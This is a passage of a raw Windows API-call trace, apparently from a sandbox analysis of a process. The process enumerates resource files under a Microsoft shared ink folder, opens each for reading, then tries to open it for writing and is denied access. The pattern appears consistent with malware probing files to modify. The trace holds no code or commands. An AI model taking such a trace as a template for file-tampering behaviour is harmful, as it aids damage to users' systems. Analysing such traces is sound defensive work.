ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0x7c896e00, ftLastWriteTime.dwHighDateTime=0x1d29fa4, nFileSizeHigh=0x0, nFileSizeLow=0x6200, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="TipRes.dll.mui", cAlternateFileName="")) returned 1 [0082.734] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0082.734] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0082.734] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0082.734] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0082.734] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0082.734] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0082.734] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0082.734] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0082.734] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0082.734] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0082.734] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0082.734] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0082.734] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0082.734] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0082.734] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0082.734] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0082.734] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0082.734] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e250 [0082.734] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0082.734] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x5a6b8 [0082.734] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e250 | out: hHeap=0x20000) returned 1 [0082.734] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0082.734] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8aa88 [0082.734] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0082.734] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.734] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.734] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.734] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.734] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aa88 | out: hHeap=0x20000) returned 1 [0082.734] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0082.734] AreFileApisANSI () returned 1 [0082.734] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\TipRes.dll.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\TipRes.dll.mui", lpUsedDefaultChar=0x0) returned 72 [0082.734] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d1b8 [0082.734] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.734] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.735] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0082.735] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0082.735] AreFileApisANSI () returned 1 [0082.735] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d1b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 72 [0082.735] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a8c0 [0082.735] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d1b8, cbMultiByte=-1, lpWideCharStr=0x8a8c0, cchWideChar=72 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\TipRes.dll.mui") returned 72 [0082.735] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\TipRes.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tipres.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x340 [0082.736] GetFileType (hFile=0x340) returned 0x1 [0082.736] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a8c0 | out: hHeap=0x20000) returned 1 [0082.736] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0082.736] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0082.736] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0082.736] CloseHandle (hObject=0x340) returned 1 [0082.737] AreFileApisANSI () returned 1 [0082.737] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d1b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 72 [0082.737] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8b110 [0082.737] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d1b8, cbMultiByte=-1, lpWideCharStr=0x8b110, cchWideChar=72 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\TipRes.dll.mui") returned 72 [0082.737] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\TipRes.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tipres.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0082.737] GetLastError () returned 0x5 [0082.737] GetLastError () returned 0x5 [0082.737] SetLastError (dwErrCode=0x5) [0082.737] GetLastError () returned 0x5 [0082.737] SetLastError (dwErrCode=0x5) [0082.737] GetLastError () returned 0x5 [0082.737] SetLastError (dwErrCode=0x5) [0082.737] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b110 | out: hHeap=0x20000) returned 1 [0082.737] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0082.737] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0082.737] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d1b8 | out: hHeap=0x20000) returned 1 [0082.737] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.737] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.737] FindNextFileW (in: hFindFile=0x78750, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e2ca937, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e2ca937, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e2ca937, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2600, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0082.737] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0082.737] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0082.737] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0082.737] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0082.737] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0082.737] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0082.737] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0082.737] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0082.737] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0082.737] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0082.738] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0082.738] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0082.738] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0082.738] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0082.738] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0082.738] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0082.738] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0082.738] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e030 [0082.738] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0082.738] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x5a6b8 [0082.738] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e030 | out: hHeap=0x20000) returned 1 [0082.738] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0082.738] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x2e430 [0082.738] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0082.738] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.738] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.738] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.738] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.738] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0082.738] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0082.738] AreFileApisANSI () returned 1 [0082.738] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\tipresx.dll.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 73 [0082.738] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0082.738] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.738] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.738] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0082.738] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0082.738] AreFileApisANSI () returned 1 [0082.739] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0082.739] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x853a0 [0082.739] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x853a0, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\tipresx.dll.mui") returned 73 [0082.739] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x340 [0082.739] GetFileType (hFile=0x340) returned 0x1 [0082.739] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x853a0 | out: hHeap=0x20000) returned 1 [0082.739] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0082.739] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0082.739] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0082.739] CloseHandle (hObject=0x340) returned 1 [0082.742] AreFileApisANSI () returned 1 [0082.742] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0082.742] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x859e0 [0082.742] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x859e0, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\tipresx.dll.mui") returned 73 [0082.742] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0082.742] GetLastError () returned 0x5 [0082.742] GetLastError () returned 0x5 [0082.742] SetLastError (dwErrCode=0x5) [0082.742] GetLastError () returned 0x5 [0082.742] SetLastError (dwErrCode=0x5) [0082.742] GetLastError () returned 0x5 [0082.742] SetLastError (dwErrCode=0x5) [0082.742] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x859e0 | out: hHeap=0x20000) returned 1 [0082.742] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0082.742] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0082.742] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0082.742] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.742] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.742] FindNextFileW (in: hFindFile=0x78750, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3dad75cd, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0x7dc8925d, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0x7d250300, ftLastWriteTime.dwHighDateTime=0x1d29faa, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="TipTsf.dll.mui", cAlternateFileName="")) returned 1 [0082.742] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0082.742] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0082.742] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0082.742] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0082.742] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0082.742] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0082.742] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0082.742] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0082.742] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0082.743] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0082.743] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0082.743] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0082.743] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0082.743] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0082.743] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0082.743] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0082.743] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0082.743] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e7a0 [0082.743] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0082.743] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x5a6b8 [0082.743] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e7a0 | out: hHeap=0x20000) returned 1 [0082.743] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0082.743] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a5c8 [0082.743] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0082.743] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.743] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.743] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.743] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.743] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a5c8 | out: hHeap=0x20000) returned 1 [0082.743] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0082.743] AreFileApisANSI () returned 1 [0082.743] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\TipTsf.dll.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\TipTsf.dll.mui", lpUsedDefaultChar=0x0) returned 72 [0082.743] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d108 [0082.743] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.743] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.743] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0082.743] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0082.743] AreFileApisANSI () returned 1 [0082.743] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 72 [0082.743] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8aeb0 [0082.744] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x8aeb0, cchWideChar=72 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\TipTsf.dll.mui") returned 72 [0082.744] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\TipTsf.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tiptsf.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x340 [0082.744] GetFileType (hFile=0x340) returned 0x1 [0082.744] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aeb0 | out: hHeap=0x20000) returned 1 [0082.744] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0082.744] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0082.744] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0082.744] CloseHandle (hObject=0x340) returned 1 [0082.745] AreFileApisANSI () returned 1 [0082.745] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 72 [0082.745] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a400 [0082.745] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x8a400, cchWideChar=72 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\TipTsf.dll.mui") returned 72 [0082.745] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\TipTsf.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tiptsf.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0082.745] GetLastError () returned 0x5 [0082.745] GetLastError () returned 0x5 [0082.745] SetLastError (dwErrCode=0x5) [0082.745] GetLastError () returned 0x5 [0082.745] SetLastError (dwErrCode=0x5) [0082.745] GetLastError () returned 0x5 [0082.745] SetLastError (dwErrCode=0x5) [0082.745] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a400 | out: hHeap=0x20000) returned 1 [0082.745] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0082.745] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0082.745] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d108 | out: hHeap=0x20000) returned 1 [0082.745] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.745] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.745] FindNextFileW (in: hFindFile=0x78750, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x8e, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x85948, ftLastWriteTime.dwHighDateTime=0x313f210, 